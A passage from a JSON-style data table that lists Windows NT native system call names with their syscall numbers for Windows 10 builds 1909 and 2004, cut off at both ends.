\"NtCreateLowBoxToken\": 173, \"NtCreateMailslotFile\": 174, \"NtCreateMutant\": 175, \"NtCreateNamedPipeFile\": 176, \"NtCreatePagingFile\": 177, \"NtCreatePartition\": 178, \"NtCreatePort\": 179, \"NtCreatePrivateNamespace\": 180, \"NtCreateProcess\": 181, \"NtCreateProfile\": 182, \"NtCreateProfileEx\": 183, \"NtCreateRegistryTransaction\": 184, \"NtCreateResourceManager\": 185, \"NtCreateSectionEx\": 186, \"NtCreateSemaphore\": 187, \"NtCreateSymbolicLinkObject\": 188, \"NtCreateThreadEx\": 189, \"NtCreateTimer\": 190, \"NtCreateTimer2\": 191, \"NtCreateToken\": 192, \"NtCreateTokenEx\": 193, \"NtCreateTransaction\": 194, \"NtCreateTransactionManager\": 195, \"NtCreateUserProcess\": 196, \"NtCreateWaitCompletionPacket\": 197, \"NtCreateWaitablePort\": 198, \"NtCreateWnfStateName\": 199, \"NtCreateWorkerFactory\": 200, \"NtDebugActiveProcess\": 201, \"NtDebugContinue\": 202, \"NtDeleteAtom\": 203, \"NtDeleteBootEntry\": 204, \"NtDeleteDriverEntry\": 205, \"NtDeleteFile\": 206, \"NtDeleteKey\": 207, \"NtDeleteObjectAuditAlarm\": 208, \"NtDeletePrivateNamespace\": 209, \"NtDeleteValueKey\": 210, \"NtDeleteWnfStateData\": 211, \"NtDeleteWnfStateName\": 212, \"NtDisableLastKnownGood\": 213, \"NtDisplayString\": 214, \"NtDrawText\": 215, \"NtEnableLastKnownGood\": 216, \"NtEnumerateBootEntries\": 217, \"NtEnumerateDriverEntries\": 218, \"NtEnumerateSystemEnvironmentValuesEx\": 219, \"NtEnumerateTransactionObject\": 220, \"NtExtendSection\": 221, \"NtFilterBootOption\": 222, \"NtFilterToken\": 223, \"NtFilterTokenEx\": 224, \"NtFlushBuffersFileEx\": 225, \"NtFlushInstallUILanguage\": 226, \"NtFlushInstructionCache\": 227, \"NtFlushKey\": 228, \"NtFlushProcessWriteBuffers\": 229, \"NtFlushVirtualMemory\": 230, \"NtFlushWriteBuffer\": 231, \"NtFreeUserPhysicalPages\": 232, \"NtFreezeRegistry\": 233, \"NtFreezeTransactions\": 234, \"NtGetCachedSigningLevel\": 235, \"NtGetCompleteWnfStateSubscription\": 236, \"NtGetContextThread\": 237, \"NtGetCurrentProcessorNumber\": 238, \"NtGetCurrentProcessorNumberEx\": 239, \"NtGetDevicePowerState\": 240, \"NtGetMUIRegistryInfo\": 241, \"NtGetNextProcess\": 242, \"NtGetNextThread\": 243, \"NtGetNlsSectionPtr\": 244, \"NtGetNotificationResourceManager\": 245, \"NtGetWriteWatch\": 246, \"NtImpersonateAnonymousToken\": 247, \"NtImpersonateThread\": 248, \"NtInitializeEnclave\": 249, \"NtInitializeNlsFiles\": 250, \"NtInitializeRegistry\": 251, \"NtInitiatePowerAction\": 252, \"NtIsSystemResumeAutomatic\": 253, \"NtIsUILanguageComitted\": 254, \"NtListenPort\": 255, \"NtLoadDriver\": 256, \"NtLoadEnclaveData\": 257, \"NtLoadKey\": 258, \"NtLoadKey2\": 259, \"NtLoadKeyEx\": 260, \"NtLockFile\": 261, \"NtLockProductActivationKeys\": 262, \"NtLockRegistryKey\": 263, \"NtLockVirtualMemory\": 264, \"NtMakePermanentObject\": 265, \"NtMakeTemporaryObject\": 266, \"NtManageHotPatch\": 267, \"NtManagePartition\": 268, \"NtMapCMFModule\": 269, \"NtMapUserPhysicalPages\": 270, \"NtMapViewOfSectionEx\": 271, \"NtModifyBootEntry\": 272, \"NtModifyDriverEntry\": 273, \"NtNotifyChangeDirectoryFile\": 274, \"NtNotifyChangeDirectoryFileEx\": 275, \"NtNotifyChangeKey\": 276, \"NtNotifyChangeMultipleKeys\": 277, \"NtNotifyChangeSession\": 278, \"NtOpenEnlistment\": 279, \"NtOpenEventPair\": 280, \"NtOpenIoCompletion\": 281, \"NtOpenJobObject\": 282, \"NtOpenKeyEx\": 283, \"NtOpenKeyTransacted\": 284, \"NtOpenKeyTransactedEx\": 285, \"NtOpenKeyedEvent\": 286, \"NtOpenMutant\": 287, \"NtOpenObjectAuditAlarm\": 288, \"NtOpenPartition\": 289, \"NtOpenPrivateNamespace\": 290, \"NtOpenProcessToken\": 291, \"NtOpenRegistryTransaction\": 292, \"NtOpenResourceManager\": 293, \"NtOpenSemaphore\": 294, \"NtOpenSession\": 295, \"NtOpenSymbolicLinkObject\": 296, \"NtOpenThread\": 297, \"NtOpenTimer\": 298, \"NtOpenTransaction\": 299, \"NtOpenTransactionManager\": 300, \"NtPlugPlayControl\": 301, \"NtPrePrepareComplete\": 302, \"NtPrePrepareEnlistment\": 303, \"NtPrepareComplete\": 304, \"NtPrepareEnlistment\": 305, \"NtPrivilegeCheck\": 306, \"NtPrivilegeObjectAuditAlarm\": 307, \"NtPrivilegedServiceAuditAlarm\": 308, \"NtPropagationComplete\": 309, \"NtPropagationFailed\": 310, \"NtPulseEvent\": 311, \"NtQueryAuxiliaryCounterFrequency\": 312, \"NtQueryBootEntryOrder\": 313, \"NtQueryBootOptions\": 314, \"NtQueryDebugFilterState\": 315, \"NtQueryDirectoryFileEx\": 316, \"NtQueryDirectoryObject\": 317, \"NtQueryDriverEntryOrder\": 318, \"NtQueryEaFile\": 319, \"NtQueryFullAttributesFile\": 320, \"NtQueryInformationAtom\": 321, \"NtQueryInformationByName\": 322, \"NtQueryInformationEnlistment\": 323, \"NtQueryInformationJobObject\": 324, \"NtQueryInformationPort\": 325, \"NtQueryInformationResourceManager\": 326, \"NtQueryInformationTransaction\": 327, \"NtQueryInformationTransactionManager\": 328, \"NtQueryInformationWorkerFactory\": 329, \"NtQueryInstallUILanguage\": 330, \"NtQueryIntervalProfile\": 331, \"NtQueryIoCompletion\": 332, \"NtQueryLicenseValue\": 333, \"NtQueryMultipleValueKey\": 334, \"NtQueryMutant\": 335, \"NtQueryOpenSubKeys\": 336, \"NtQueryOpenSubKeysEx\": 337, \"NtQueryPortInformationProcess\": 338, \"NtQueryQuotaInformationFile\": 339, \"NtQuerySecurityAttributesToken\": 340, \"NtQuerySecurityObject\": 341, \"NtQuerySecurityPolicy\": 342, \"NtQuerySemaphore\": 343, \"NtQuerySymbolicLinkObject\": 344, \"NtQuerySystemEnvironmentValue\": 345, \"NtQuerySystemEnvironmentValueEx\": 346, \"NtQuerySystemInformationEx\": 347, \"NtQueryTimerResolution\": 348, \"NtQueryWnfStateData\": 349, \"NtQueryWnfStateNameInformation\": 350, \"NtQueueApcThreadEx\": 351, \"NtRaiseException\": 352, \"NtRaiseHardError\": 353, \"NtReadOnlyEnlistment\": 354, \"NtRecoverEnlistment\": 355, \"NtRecoverResourceManager\": 356, \"NtRecoverTransactionManager\": 357, \"NtRegisterProtocolAddressInformation\": 358, \"NtRegisterThreadTerminatePort\": 359, \"NtReleaseKeyedEvent\": 360, \"NtReleaseWorkerFactoryWorker\": 361, \"NtRemoveIoCompletionEx\": 362, \"NtRemoveProcessDebug\": 363, \"NtRenameKey\": 364, \"NtRenameTransactionManager\": 365, \"NtReplaceKey\": 366, \"NtReplacePartitionUnit\": 367, \"NtReplyWaitReplyPort\": 368, \"NtRequestPort\": 369, \"NtResetEvent\": 370, \"NtResetWriteWatch\": 371, \"NtRestoreKey\": 372, \"NtResumeProcess\": 373, \"NtRevertContainerImpersonation\": 374, \"NtRollbackComplete\": 375, \"NtRollbackEnlistment\": 376, \"NtRollbackRegistryTransaction\": 377, \"NtRollbackTransaction\": 378, \"NtRollforwardTransactionManager\": 379, \"NtSaveKey\": 380, \"NtSaveKeyEx\": 381, \"NtSaveMergedKeys\": 382, \"NtSecureConnectPort\": 383, \"NtSerializeBoot\": 384, \"NtSetBootEntryOrder\": 385, \"NtSetBootOptions\": 386, \"NtSetCachedSigningLevel\": 387, \"NtSetCachedSigningLevel2\": 388, \"NtSetContextThread\": 389, \"NtSetDebugFilterState\": 390, \"NtSetDefaultHardErrorPort\": 391, \"NtSetDefaultLocale\": 392, \"NtSetDefaultUILanguage\": 393, \"NtSetDriverEntryOrder\": 394, \"NtSetEaFile\": 395, \"NtSetHighEventPair\": 396, \"NtSetHighWaitLowEventPair\": 397, \"NtSetIRTimer\": 398, \"NtSetInformationDebugObject\": 399, \"NtSetInformationEnlistment\": 400, \"NtSetInformationJobObject\": 401, \"NtSetInformationKey\": 402, \"NtSetInformationResourceManager\": 403, \"NtSetInformationSymbolicLink\": 404, \"NtSetInformationToken\": 405, \"NtSetInformationTransaction\": 406, \"NtSetInformationTransactionManager\": 407, \"NtSetInformationVirtualMemory\": 408, \"NtSetInformationWorkerFactory\": 409, \"NtSetIntervalProfile\": 410, \"NtSetIoCompletion\": 411, \"NtSetIoCompletionEx\": 412, \"NtSetLdtEntries\": 413, \"NtSetLowEventPair\": 414, \"NtSetLowWaitHighEventPair\": 415, \"NtSetQuotaInformationFile\": 416, \"NtSetSecurityObject\": 417, \"NtSetSystemEnvironmentValue\": 418, \"NtSetSystemEnvironmentValueEx\": 419, \"NtSetSystemInformation\": 420, \"NtSetSystemPowerState\": 421, \"NtSetSystemTime\": 422, \"NtSetThreadExecutionState\": 423, \"NtSetTimer2\": 424, \"NtSetTimerEx\": 425, \"NtSetTimerResolution\": 426, \"NtSetUuidSeed\": 427, \"NtSetVolumeInformationFile\": 428, \"NtSetWnfProcessNotificationEvent\": 429, \"NtShutdownSystem\": 430, \"NtShutdownWorkerFactory\": 431, \"NtSignalAndWaitForSingleObject\": 432, \"NtSinglePhaseReject\": 433, \"NtStartProfile\": 434, \"NtStopProfile\": 435, \"NtSubscribeWnfStateChange\": 436, \"NtSuspendProcess\": 437, \"NtSuspendThread\": 438, \"NtSystemDebugControl\": 439, \"NtTerminateEnclave\": 440, \"NtTerminateJobObject\": 441, \"NtTestAlert\": 442, \"NtThawRegistry\": 443, \"NtThawTransactions\": 444, \"NtTraceControl\": 445, \"NtTranslateFilePath\": 446, \"NtUmsThreadYield\": 447, \"NtUnloadDriver\": 448, \"NtUnloadKey\": 449, \"NtUnloadKey2\": 450, \"NtUnloadKeyEx\": 451, \"NtUnlockFile\": 452, \"NtUnlockVirtualMemory\": 453, \"NtUnmapViewOfSectionEx\": 454, \"NtUnsubscribeWnfStateChange\": 455, \"NtUpdateWnfStateData\": 456, \"NtVdmControl\": 457, \"NtWaitForAlertByThreadId\": 458, \"NtWaitForDebugEvent\": 459, \"NtWaitForKeyedEvent\": 460, \"NtWaitForWorkViaWorkerFactory\": 461, \"NtWaitHighEventPair\": 462, \"NtWaitLowEventPair\": 463}, \"1909\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAllocateVirtualMemoryEx\": 116, \"NtAlpcAcceptConnectPort\": 117, \"NtAlpcCancelMessage\": 118, \"NtAlpcConnectPort\": 119, \"NtAlpcConnectPortEx\": 120, \"NtAlpcCreatePort\": 121, \"NtAlpcCreatePortSection\": 122, \"NtAlpcCreateResourceReserve\": 123, \"NtAlpcCreateSectionView\": 124, \"NtAlpcCreateSecurityContext\": 125, \"NtAlpcDeletePortSection\": 126, \"NtAlpcDeleteResourceReserve\": 127, \"NtAlpcDeleteSectionView\": 128, \"NtAlpcDeleteSecurityContext\": 129, \"NtAlpcDisconnectPort\": 130, \"NtAlpcImpersonateClientContainerOfPort\": 131, \"NtAlpcImpersonateClientOfPort\": 132, \"NtAlpcOpenSenderProcess\": 133, \"NtAlpcOpenSenderThread\": 134, \"NtAlpcQueryInformation\": 135, \"NtAlpcQueryInformationMessage\": 136, \"NtAlpcRevokeSecurityContext\": 137, \"NtAlpcSendWaitReceivePort\": 138, \"NtAlpcSetInformation\": 139, \"NtAreMappedFilesTheSame\": 140, \"NtAssignProcessToJobObject\": 141, \"NtAssociateWaitCompletionPacket\": 142, \"NtCallEnclave\": 143, \"NtCancelIoFileEx\": 144, \"NtCancelSynchronousIoFile\": 145, \"NtCancelTimer2\": 146, \"NtCancelWaitCompletionPacket\": 147, \"NtCommitComplete\": 148, \"NtCommitEnlistment\": 149, \"NtCommitRegistryTransaction\": 150, \"NtCommitTransaction\": 151, \"NtCompactKeys\": 152, \"NtCompareObjects\": 153, \"NtCompareSigningLevels\": 154, \"NtCompareTokens\": 155, \"NtCompleteConnectPort\": 156, \"NtCompressKey\": 157, \"NtConnectPort\": 158, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 159, \"NtCreateCrossVmEvent\": 160, \"NtCreateDebugObject\": 161, \"NtCreateDirectoryObject\": 162, \"NtCreateDirectoryObjectEx\": 163, \"NtCreateEnclave\": 164, \"NtCreateEnlistment\": 165, \"NtCreateEventPair\": 166, \"NtCreateIRTimer\": 167, \"NtCreateIoCompletion\": 168, \"NtCreateJobObject\": 169, \"NtCreateJobSet\": 170, \"NtCreateKeyTransacted\": 171, \"NtCreateKeyedEvent\": 172, \"NtCreateLowBoxToken\": 173, \"NtCreateMailslotFile\": 174, \"NtCreateMutant\": 175, \"NtCreateNamedPipeFile\": 176, \"NtCreatePagingFile\": 177, \"NtCreatePartition\": 178, \"NtCreatePort\": 179, \"NtCreatePrivateNamespace\": 180, \"NtCreateProcess\": 181, \"NtCreateProfile\": 182, \"NtCreateProfileEx\": 183, \"NtCreateRegistryTransaction\": 184, \"NtCreateResourceManager\": 185, \"NtCreateSectionEx\": 186, \"NtCreateSemaphore\": 187, \"NtCreateSymbolicLinkObject\": 188, \"NtCreateThreadEx\": 189, \"NtCreateTimer\": 190, \"NtCreateTimer2\": 191, \"NtCreateToken\": 192, \"NtCreateTokenEx\": 193, \"NtCreateTransaction\": 194, \"NtCreateTransactionManager\": 195, \"NtCreateUserProcess\": 196, \"NtCreateWaitCompletionPacket\": 197, \"NtCreateWaitablePort\": 198, \"NtCreateWnfStateName\": 199, \"NtCreateWorkerFactory\": 200, \"NtDebugActiveProcess\": 201, \"NtDebugContinue\": 202, \"NtDeleteAtom\": 203, \"NtDeleteBootEntry\": 204, \"NtDeleteDriverEntry\": 205, \"NtDeleteFile\": 206, \"NtDeleteKey\": 207, \"NtDeleteObjectAuditAlarm\": 208, \"NtDeletePrivateNamespace\": 209, \"NtDeleteValueKey\": 210, \"NtDeleteWnfStateData\": 211, \"NtDeleteWnfStateName\": 212, \"NtDisableLastKnownGood\": 213, \"NtDisplayString\": 214, \"NtDrawText\": 215, \"NtEnableLastKnownGood\": 216, \"NtEnumerateBootEntries\": 217, \"NtEnumerateDriverEntries\": 218, \"NtEnumerateSystemEnvironmentValuesEx\": 219, \"NtEnumerateTransactionObject\": 220, \"NtExtendSection\": 221, \"NtFilterBootOption\": 222, \"NtFilterToken\": 223, \"NtFilterTokenEx\": 224, \"NtFlushBuffersFileEx\": 225, \"NtFlushInstallUILanguage\": 226, \"NtFlushInstructionCache\": 227, \"NtFlushKey\": 228, \"NtFlushProcessWriteBuffers\": 229, \"NtFlushVirtualMemory\": 230, \"NtFlushWriteBuffer\": 231, \"NtFreeUserPhysicalPages\": 232, \"NtFreezeRegistry\": 233, \"NtFreezeTransactions\": 234, \"NtGetCachedSigningLevel\": 235, \"NtGetCompleteWnfStateSubscription\": 236, \"NtGetContextThread\": 237, \"NtGetCurrentProcessorNumber\": 238, \"NtGetCurrentProcessorNumberEx\": 239, \"NtGetDevicePowerState\": 240, \"NtGetMUIRegistryInfo\": 241, \"NtGetNextProcess\": 242, \"NtGetNextThread\": 243, \"NtGetNlsSectionPtr\": 244, \"NtGetNotificationResourceManager\": 245, \"NtGetWriteWatch\": 246, \"NtImpersonateAnonymousToken\": 247, \"NtImpersonateThread\": 248, \"NtInitializeEnclave\": 249, \"NtInitializeNlsFiles\": 250, \"NtInitializeRegistry\": 251, \"NtInitiatePowerAction\": 252, \"NtIsSystemResumeAutomatic\": 253, \"NtIsUILanguageComitted\": 254, \"NtListenPort\": 255, \"NtLoadDriver\": 256, \"NtLoadEnclaveData\": 257, \"NtLoadKey\": 258, \"NtLoadKey2\": 259, \"NtLoadKeyEx\": 260, \"NtLockFile\": 261, \"NtLockProductActivationKeys\": 262, \"NtLockRegistryKey\": 263, \"NtLockVirtualMemory\": 264, \"NtMakePermanentObject\": 265, \"NtMakeTemporaryObject\": 266, \"NtManageHotPatch\": 267, \"NtManagePartition\": 268, \"NtMapCMFModule\": 269, \"NtMapUserPhysicalPages\": 270, \"NtMapViewOfSectionEx\": 271, \"NtModifyBootEntry\": 272, \"NtModifyDriverEntry\": 273, \"NtNotifyChangeDirectoryFile\": 274, \"NtNotifyChangeDirectoryFileEx\": 275, \"NtNotifyChangeKey\": 276, \"NtNotifyChangeMultipleKeys\": 277, \"NtNotifyChangeSession\": 278, \"NtOpenEnlistment\": 279, \"NtOpenEventPair\": 280, \"NtOpenIoCompletion\": 281, \"NtOpenJobObject\": 282, \"NtOpenKeyEx\": 283, \"NtOpenKeyTransacted\": 284, \"NtOpenKeyTransactedEx\": 285, \"NtOpenKeyedEvent\": 286, \"NtOpenMutant\": 287, \"NtOpenObjectAuditAlarm\": 288, \"NtOpenPartition\": 289, \"NtOpenPrivateNamespace\": 290, \"NtOpenProcessToken\": 291, \"NtOpenRegistryTransaction\": 292, \"NtOpenResourceManager\": 293, \"NtOpenSemaphore\": 294, \"NtOpenSession\": 295, \"NtOpenSymbolicLinkObject\": 296, \"NtOpenThread\": 297, \"NtOpenTimer\": 298, \"NtOpenTransaction\": 299, \"NtOpenTransactionManager\": 300, \"NtPlugPlayControl\": 301, \"NtPrePrepareComplete\": 302, \"NtPrePrepareEnlistment\": 303, \"NtPrepareComplete\": 304, \"NtPrepareEnlistment\": 305, \"NtPrivilegeCheck\": 306, \"NtPrivilegeObjectAuditAlarm\": 307, \"NtPrivilegedServiceAuditAlarm\": 308, \"NtPropagationComplete\": 309, \"NtPropagationFailed\": 310, \"NtPulseEvent\": 311, \"NtQueryAuxiliaryCounterFrequency\": 312, \"NtQueryBootEntryOrder\": 313, \"NtQueryBootOptions\": 314, \"NtQueryDebugFilterState\": 315, \"NtQueryDirectoryFileEx\": 316, \"NtQueryDirectoryObject\": 317, \"NtQueryDriverEntryOrder\": 318, \"NtQueryEaFile\": 319, \"NtQueryFullAttributesFile\": 320, \"NtQueryInformationAtom\": 321, \"NtQueryInformationByName\": 322, \"NtQueryInformationEnlistment\": 323, \"NtQueryInformationJobObject\": 324, \"NtQueryInformationPort\": 325, \"NtQueryInformationResourceManager\": 326, \"NtQueryInformationTransaction\": 327, \"NtQueryInformationTransactionManager\": 328, \"NtQueryInformationWorkerFactory\": 329, \"NtQueryInstallUILanguage\": 330, \"NtQueryIntervalProfile\": 331, \"NtQueryIoCompletion\": 332, \"NtQueryLicenseValue\": 333, \"NtQueryMultipleValueKey\": 334, \"NtQueryMutant\": 335, \"NtQueryOpenSubKeys\": 336, \"NtQueryOpenSubKeysEx\": 337, \"NtQueryPortInformationProcess\": 338, \"NtQueryQuotaInformationFile\": 339, \"NtQuerySecurityAttributesToken\": 340, \"NtQuerySecurityObject\": 341, \"NtQuerySecurityPolicy\": 342, \"NtQuerySemaphore\": 343, \"NtQuerySymbolicLinkObject\": 344, \"NtQuerySystemEnvironmentValue\": 345, \"NtQuerySystemEnvironmentValueEx\": 346, \"NtQuerySystemInformationEx\": 347, \"NtQueryTimerResolution\": 348, \"NtQueryWnfStateData\": 349, \"NtQueryWnfStateNameInformation\": 350, \"NtQueueApcThreadEx\": 351, \"NtRaiseException\": 352, \"NtRaiseHardError\": 353, \"NtReadOnlyEnlistment\": 354, \"NtRecoverEnlistment\": 355, \"NtRecoverResourceManager\": 356, \"NtRecoverTransactionManager\": 357, \"NtRegisterProtocolAddressInformation\": 358, \"NtRegisterThreadTerminatePort\": 359, \"NtReleaseKeyedEvent\": 360, \"NtReleaseWorkerFactoryWorker\": 361, \"NtRemoveIoCompletionEx\": 362, \"NtRemoveProcessDebug\": 363, \"NtRenameKey\": 364, \"NtRenameTransactionManager\": 365, \"NtReplaceKey\": 366, \"NtReplacePartitionUnit\": 367, \"NtReplyWaitReplyPort\": 368, \"NtRequestPort\": 369, \"NtResetEvent\": 370, \"NtResetWriteWatch\": 371, \"NtRestoreKey\": 372, \"NtResumeProcess\": 373, \"NtRevertContainerImpersonation\": 374, \"NtRollbackComplete\": 375, \"NtRollbackEnlistment\": 376, \"NtRollbackRegistryTransaction\": 377, \"NtRollbackTransaction\": 378, \"NtRollforwardTransactionManager\": 379, \"NtSaveKey\": 380, \"NtSaveKeyEx\": 381, \"NtSaveMergedKeys\": 382, \"NtSecureConnectPort\": 383, \"NtSerializeBoot\": 384, \"NtSetBootEntryOrder\": 385, \"NtSetBootOptions\": 386, \"NtSetCachedSigningLevel\": 387, \"NtSetCachedSigningLevel2\": 388, \"NtSetContextThread\": 389, \"NtSetDebugFilterState\": 390, \"NtSetDefaultHardErrorPort\": 391, \"NtSetDefaultLocale\": 392, \"NtSetDefaultUILanguage\": 393, \"NtSetDriverEntryOrder\": 394, \"NtSetEaFile\": 395, \"NtSetHighEventPair\": 396, \"NtSetHighWaitLowEventPair\": 397, \"NtSetIRTimer\": 398, \"NtSetInformationDebugObject\": 399, \"NtSetInformationEnlistment\": 400, \"NtSetInformationJobObject\": 401, \"NtSetInformationKey\": 402, \"NtSetInformationResourceManager\": 403, \"NtSetInformationSymbolicLink\": 404, \"NtSetInformationToken\": 405, \"NtSetInformationTransaction\": 406, \"NtSetInformationTransactionManager\": 407, \"NtSetInformationVirtualMemory\": 408, \"NtSetInformationWorkerFactory\": 409, \"NtSetIntervalProfile\": 410, \"NtSetIoCompletion\": 411, \"NtSetIoCompletionEx\": 412, \"NtSetLdtEntries\": 413, \"NtSetLowEventPair\": 414, \"NtSetLowWaitHighEventPair\": 415, \"NtSetQuotaInformationFile\": 416, \"NtSetSecurityObject\": 417, \"NtSetSystemEnvironmentValue\": 418, \"NtSetSystemEnvironmentValueEx\": 419, \"NtSetSystemInformation\": 420, \"NtSetSystemPowerState\": 421, \"NtSetSystemTime\": 422, \"NtSetThreadExecutionState\": 423, \"NtSetTimer2\": 424, \"NtSetTimerEx\": 425, \"NtSetTimerResolution\": 426, \"NtSetUuidSeed\": 427, \"NtSetVolumeInformationFile\": 428, \"NtSetWnfProcessNotificationEvent\": 429, \"NtShutdownSystem\": 430, \"NtShutdownWorkerFactory\": 431, \"NtSignalAndWaitForSingleObject\": 432, \"NtSinglePhaseReject\": 433, \"NtStartProfile\": 434, \"NtStopProfile\": 435, \"NtSubscribeWnfStateChange\": 436, \"NtSuspendProcess\": 437, \"NtSuspendThread\": 438, \"NtSystemDebugControl\": 439, \"NtTerminateEnclave\": 440, \"NtTerminateJobObject\": 441, \"NtTestAlert\": 442, \"NtThawRegistry\": 443, \"NtThawTransactions\": 444, \"NtTraceControl\": 445, \"NtTranslateFilePath\": 446, \"NtUmsThreadYield\": 447, \"NtUnloadDriver\": 448, \"NtUnloadKey\": 449, \"NtUnloadKey2\": 450, \"NtUnloadKeyEx\": 451, \"NtUnlockFile\": 452, \"NtUnlockVirtualMemory\": 453, \"NtUnmapViewOfSectionEx\": 454, \"NtUnsubscribeWnfStateChange\": 455, \"NtUpdateWnfStateData\": 456, \"NtVdmControl\": 457, \"NtWaitForAlertByThreadId\": 458, \"NtWaitForDebugEvent\": 459, \"NtWaitForKeyedEvent\": 460, \"NtWaitForWorkViaWorkerFactory\": 461, \"NtWaitHighEventPair\": 462, \"NtWaitLowEventPair\": 463}, \"2004\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, 